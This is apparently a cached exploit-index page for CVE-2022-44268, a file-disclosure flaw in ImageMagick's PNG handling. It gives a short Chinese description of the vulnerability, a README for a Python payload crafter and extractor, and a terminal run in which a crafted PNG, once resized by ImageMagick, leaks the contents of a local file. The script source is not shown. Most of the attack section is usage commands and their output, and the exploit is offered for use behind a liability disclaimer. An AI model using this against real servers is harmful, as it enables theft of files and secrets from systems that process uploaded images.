CVE-2022-44268 PoC — ImageMagick 安全漏洞

Source

https://github.com/agathanon/cve-2022-44268

Associated Vulnerability

Title:ImageMagick 安全漏洞 (CVE-2022-44268)
Description:ImageMagick是美国ImageMagick公司的一套开源的图像处理软件。该软件可读取、转换或写入多种格式的图片。 ImageMagick 7.1.0-49版本存在安全漏洞，该漏洞源于存在信息泄露漏洞，当它在解析PNG图像时生成的图像可能会嵌入任意文件内容。

Description

Payload generator and extractor for CVE-2022-44268 written in Python.

Readme

# CVE-2022-44268

**Credit to the researchers who discovered this:**
- [Bryan Gonzalez and the Ocelot Team](https://www.metabaseq.com/imagemagick-zero-days/)

Create a malicious PNG to take advantage of ImageMagick 7.1.0-40:
- CVE-2022-44267: Denial of Service
- CVE-2022-44268: Information Disclosure

*Disclaimer: The author of this project is not responsible for any possible harm caused by the materials of this project.*

## Requirements
- Python3
- PIL (`pip install Pillow`)

## Usage
Crafting a PNG with **craft.py**:
```shell
git clone https://github.com/agathanon/cve-2022-44268
cd cve-2022-44268
python3 craft.py original.png lol.png /path/to/file
```

Data extraction with **extract.py**:
```shell
python3 extract.py exfil.png
```

## PoC
```shell
anon@computer:~/code/cve-2022-44268$ python3 craft.py original.png readflag.png $PWD/flag.txt 
anon@computer:~/code/cve-2022-44268$ convert readflag.png -resize 100x100 exfil.png
anon@computer:~/code/cve-2022-44268$ python3 extract.py exfil.png
AAAABBBBCCCC

anon@computer:~/code/cve-2022-44268$ 
```

File Snapshot


 [4.0K]  /data/pocs/d4a943003c9a1380eb665c26f24bba300a9fc209
├── [ 526]  craft.py
├── [ 567]  extract.py
└── [1.0K]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!